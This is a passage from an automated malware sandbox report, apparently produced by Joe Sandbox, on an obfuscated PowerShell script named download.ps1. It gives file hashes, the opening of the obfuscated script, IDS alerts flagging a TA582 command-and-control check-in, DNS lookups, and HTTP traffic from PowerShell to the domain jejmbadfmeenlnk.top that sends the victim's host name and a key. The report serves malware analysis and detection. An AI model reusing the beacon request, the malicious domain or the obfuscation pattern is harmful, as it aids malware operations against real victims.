                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6222
                                                                                                        Entropy (8bit):3.7013677782627346
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:nQarCRqotBkvhkvCCt349yqhHQ49yq2BHb:nQa0qwd349c49A
                                                                                                        MD5:9D460B3125F6B79756BA645111960BB4
                                                                                                        SHA1:02E78DD1A470022952F01E2B8D91F96EB44EF1F2
                                                                                                        SHA-256:6F757EDDC603044C1BF43E0B66965CC7DB19EBE94AD2461B556D361D42000875
                                                                                                        SHA-512:423C0ACA841CFFE4CBE18ADCA914E025A3BEC68FB6EA0EC11288097685952F00A01A1FB8A57110F269B6F844B743328ED0321D4D21B0BD08880F3E0D5675534D
                                                                                                        Malicious:false
                                                                                                        Preview:...................................FL..................F.".. ...d........Ke.b..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........`.b..ixUe.b......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl)ZW[....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....)ZZ[..Roaming.@......DWSl)ZZ[....C......................}v.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl)ZW[....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl)ZW[....E.....................v..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl)ZW[....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl)ZW[....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl)Z`[....q...........

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RP57L8KE9OEMU0ZDR56S.temp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6222
                                                                                                        Entropy (8bit):3.7013677782627346
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:nQarCRqotBkvhkvCCt349yqhHQ49yq2BHb:nQa0qwd349c49A
                                                                                                        MD5:9D460B3125F6B79756BA645111960BB4
                                                                                                        SHA1:02E78DD1A470022952F01E2B8D91F96EB44EF1F2
                                                                                                        SHA-256:6F757EDDC603044C1BF43E0B66965CC7DB19EBE94AD2461B556D361D42000875
                                                                                                        SHA-512:423C0ACA841CFFE4CBE18ADCA914E025A3BEC68FB6EA0EC11288097685952F00A01A1FB8A57110F269B6F844B743328ED0321D4D21B0BD08880F3E0D5675534D
                                                                                                        Malicious:false
                                                                                                        Preview:...................................FL..................F.".. ...d........Ke.b..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........`.b..ixUe.b......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl)ZW[....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....)ZZ[..Roaming.@......DWSl)ZZ[....C......................}v.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl)ZW[....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl)ZW[....E.....................v..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl)ZW[....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl)ZW[....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl)Z`[....q...........

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:ASCII text, with very long lines (10507), with CRLF line terminators
                                                                                                        Entropy (8bit):5.968058542540818
                                                                                                        TrID:
                                                                                                          File name:download.ps1
                                                                                                          File size:19'684 bytes
                                                                                                          MD5:c1b62618e0e00d6a5aea3dfd2e52ccac
                                                                                                          SHA1:7a3342c0c395ce755b2f8061fe32fc9dc2e3df6c
                                                                                                          SHA256:6a9d1fddcea756db4858890143b4b9e01616c566cfcc5987a062ce799122925d
                                                                                                          SHA512:026807b64cac520db97c55931f78775ead7e1ab2900c6fa65eecd2821e2500d1d5354359531c3d8a6d85362dd56f310aaa14dc99e3e803ed1748069cdf84773f
                                                                                                          SSDEEP:384:4tRphUa/b0HVa9vNHmYbrvalGD/EBsXYoHN7HkgeLi:Cpya/b4af/D/EBsxt7H8Li
                                                                                                          TLSH:BA927EC63748D9D2A7DDC66FA6067C083B79647EE1B7A5C4B999C48233C13059DCEC81
                                                                                                          File Content Preview:$cqyepshn=$executioncontext;$onbeananorbeedonbeenesonrealaratreis = -join (0..54 | ForEach-Object {[char]([int]"00650064006900620068006600680067006700620068006000610067006400680066006800680061006600680067006400670062006800600067006200680061006800670061006

                                                                                                          File Icon

                                                                                                          Icon Hash:3270d6baae77db44

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-09T12:27:06.311533+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.54970445.61.136.13880TCP
                                                                                                          2025-01-09T12:27:06.311533+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.54970445.61.136.13880TCP
                                                                                                          2025-01-09T12:27:06.984569+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549705142.250.185.19680TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 9, 2025 12:27:05.635212898 CET4970480192.168.2.545.61.136.138
                                                                                                          Jan 9, 2025 12:27:05.640034914 CET804970445.61.136.138192.168.2.5
                                                                                                          Jan 9, 2025 12:27:05.640160084 CET4970480192.168.2.545.61.136.138
                                                                                                          Jan 9, 2025 12:27:05.644449949 CET4970480192.168.2.545.61.136.138
                                                                                                          Jan 9, 2025 12:27:05.649224043 CET804970445.61.136.138192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.260988951 CET804970445.61.136.138192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.276213884 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:06.281100035 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.281702042 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:06.281845093 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:06.286619902 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.311532974 CET4970480192.168.2.545.61.136.138
                                                                                                          Jan 9, 2025 12:27:06.984381914 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984419107 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984438896 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984518051 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984534025 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984544039 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984555006 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984569073 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:06.984631062 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:06.984762907 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984774113 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984783888 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.984817982 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:06.984829903 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:06.989355087 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.989411116 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.990003109 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.076476097 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.076493979 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.076505899 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.076546907 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.076581955 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.076592922 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.076603889 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.076642990 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.076673031 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.079788923 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.079798937 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.079809904 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.079849005 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.079873085 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.079884052 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.086000919 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.086056948 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.086067915 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.086117029 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.092287064 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.092343092 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.092354059 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.092396021 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.092426062 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.098712921 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.098721981 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.098766088 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.098782063 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.098783970 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.098838091 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.104887962 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.104906082 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.104967117 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.105026007 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.105104923 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.105153084 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.111192942 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.111212969 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.111284018 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.111301899 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.111310959 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.111386061 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.117563963 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.117609978 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.117666006 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.117700100 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.117718935 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.117813110 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.123859882 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.123943090 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.123953104 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.124062061 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.168618917 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.168669939 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.168679953 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.168685913 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.168734074 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.168843985 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.168903112 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.168912888 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.168957949 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.169025898 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.169100046 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.169101000 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.172370911 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.172410965 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.172421932 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.172476053 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.179109097 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.179171085 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.179224968 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.179227114 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.179241896 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.179286957 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.184942007 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.184962034 CET8049705142.250.185.196192.168.2.5
                                                                                                          Jan 9, 2025 12:27:07.185012102 CET4970580192.168.2.5142.250.185.196
                                                                                                          Jan 9, 2025 12:27:07.451036930 CET4970480192.168.2.545.61.136.138
                                                                                                          Jan 9, 2025 12:27:07.451972008 CET4970580192.168.2.5142.250.185.196

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 9, 2025 12:27:05.586472034 CET4984953192.168.2.51.1.1.1
                                                                                                          Jan 9, 2025 12:27:05.625318050 CET53498491.1.1.1192.168.2.5
                                                                                                          Jan 9, 2025 12:27:06.263231993 CET6187953192.168.2.51.1.1.1
                                                                                                          Jan 9, 2025 12:27:06.270114899 CET53618791.1.1.1192.168.2.5

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 9, 2025 12:27:05.586472034 CET192.168.2.51.1.1.10xf7c4Standard query (0)jejmbadfmeenlnk.topA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 12:27:06.263231993 CET192.168.2.51.1.1.10xa9e9Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 9, 2025 12:27:05.625318050 CET1.1.1.1192.168.2.50xf7c4No error (0)jejmbadfmeenlnk.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 12:27:06.270114899 CET1.1.1.1192.168.2.50xa9e9No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • jejmbadfmeenlnk.top
                                                                                                          • www.google.com

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.54970445.61.136.138802640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 9, 2025 12:27:05.644449949 CET216OUTGET /rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527 HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                          Host: jejmbadfmeenlnk.top
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 9, 2025 12:27:06.260988951 CET166INHTTP/1.1 302 Found
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Thu, 09 Jan 2025 11:27:06 GMT
                                                                                                          Content-Length: 0
                                                                                                          Connection: keep-alive
                                                                                                          Location: http://www.google.com


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.549705142.250.185.196802640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 9, 2025 12:27:06.281845093 CET159OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                          Host: www.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 9, 2025 12:27:06.984381914 CET1236INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 09 Jan 2025 11:27:06 GMT
                                                                                                          Expires: -1
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-R_F3fqEl8RW69899R3AxVQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                          Server: gws
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          Set-Cookie: AEC=AZ6Zc-UhL-5UnOx_Q51jmWeMo1lVMyn40mVJondlMUvN3qycaVG2owLutYI; expires=Tue, 08-Jul-2025 11:27:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                          Set-Cookie: NID=520=kggu2k6jBQ0_SPMfqe-rSDTyAnFs32c0QC-jePm3Bl25Ms_Db5fdKSsyclSdVLyYtlRQhIGobjWTgd5qALGVvtIBAvvG0KkQnuiICv_ITlT5oeuHHtR_WXhV-YbVOVfSVa8yOP3u4-pQWlfuESnY9d0ZQDQFyNrCGpOFJw1pcPDo-uaq0oj2cBN0qEKz_nqRY5iH1XmJ; expires=Fri, 11-Jul-2025 11:27:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                          Accept-Ranges: none
                                                                                                          Vary: Accept-Encoding
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Data Raw: 35 34 64 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20
                                                                                                          Data Ascii: 54d5<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                          Jan 9, 2025 12:27:06.984419107 CET1236INData Raw: 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f
                                                                                                          Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/lo
                                                                                                          Jan 9, 2025 12:27:06.984438896 CET1236INData Raw: 39 2c 31 35 39 30 32 34 2c 32 35 36 34 31 37 2c 31 30 31 36 31 2c 34 35 37 38 36 2c 39 37 37 39 2c 39 39 34 30 34 2c 33 38 30 31 2c 32 34 31 32 2c 35 30 38 36 39 2c 37 37 33 34 2c 33 39 33 34 38 2c 31 36 33 34 2c 32 39 32 37 37 2c 32 37 30 38 33
                                                                                                          Data Ascii: 9,159024,256417,10161,45786,9779,99404,3801,2412,50869,7734,39348,1634,29277,27083,5213674,766,56,5992031,2842789,33,7437953,20539939,25222751,1294,4636,16436,29939,31642,45086,885,14280,8181,5934,43496,19011,2657,3437,3319,23879,9139,4599,328
                                                                                                          Jan 9, 2025 12:27:06.984518051 CET1236INData Raw: 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f 30 3a 61 2e 73 74 76 73 63 29 3f 67 6f 6f 67 6c 65 2e 6b 45 49 3d 5f 67 2e 6b 45 49 3a 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 5f 67 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29
                                                                                                          Data Ascii: a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var g=this||self;function k(){return window.google&&window.google.kOPI||null};var l,m=[];fu
                                                                                                          Jan 9, 2025 12:27:06.984534025 CET1236INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 76 61 72 20 64 3b 28 64 3d 67 6f 6f 67 6c 65 29 2e 78 7c 7c 28 64 2e 78 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 29 76
                                                                                                          Data Ascii: (function(){google.y={};google.sy=[];var d;(d=google).x||(d.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1});var e;(e=google).sx||(e.sx=function(a){google.sy.push(a)});google.lm=[];var f;(
                                                                                                          Jan 9, 2025 12:27:06.984544039 CET1236INData Raw: 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61
                                                                                                          Data Ascii: nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden;z-index:998;right:0}.gbto #gbs{background:#fff}#gbx3,#gbx4{background-
                                                                                                          Jan 9, 2025 12:27:06.984555006 CET776INData Raw: 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66
                                                                                                          Data Ascii: ex:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.
                                                                                                          Jan 9, 2025 12:27:06.984762907 CET1236INData Raw: 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 76 65 72 74
                                                                                                          Data Ascii: ative;display:-moz-inline-box;display:inline-block;line-height:27px;padding:0;vertical-align:top}.gbt{*display:inline}.gbto{box-shadow:0 2px 4px rgba(0,0,0,.2);-moz-box-shadow:0 2px 4px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2
                                                                                                          Jan 9, 2025 12:27:06.984774113 CET1236INData Raw: 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 30 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b
                                                                                                          Data Ascii: d-image:none;background-position:0 -102px;background-repeat:repeat-x;outline:none;text-decoration:none !important}.gbpdjs .gbto .gbm{min-width:99%}.gbz0l .gbtb2{border-top-color:#dd4b39!important}#gbi4s,#gbi4s1{font-weight:bold}#gbg6.gbgt-hvr,
                                                                                                          Jan 9, 2025 12:27:06.984783888 CET1236INData Raw: 6e 20 2e 67 62 6d 74 2c 2e 67 62 6e 20 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 2c 2e 67 62 6e 64 20 2e 67 62 6d 74 2c 2e 67 62 6e 64 20 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 64 64 38 65 32 37 20 21 69 6d 70 6f 72 74 61 6e
                                                                                                          Data Ascii: n .gbmt,.gbn .gbmt:visited,.gbnd .gbmt,.gbnd .gbmt:visited{color:#dd8e27 !important}.gbf .gbmt,.gbf .gbmt:visited{color:#900 !important}.gbmt,.gbml1,.gbmlb,.gbmt:visited,.gbml1:visited,.gbmlb:visited{color:#36c !important;text-decoration:none
                                                                                                          Jan 9, 2025 12:27:06.989355087 CET1236INData Raw: 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b
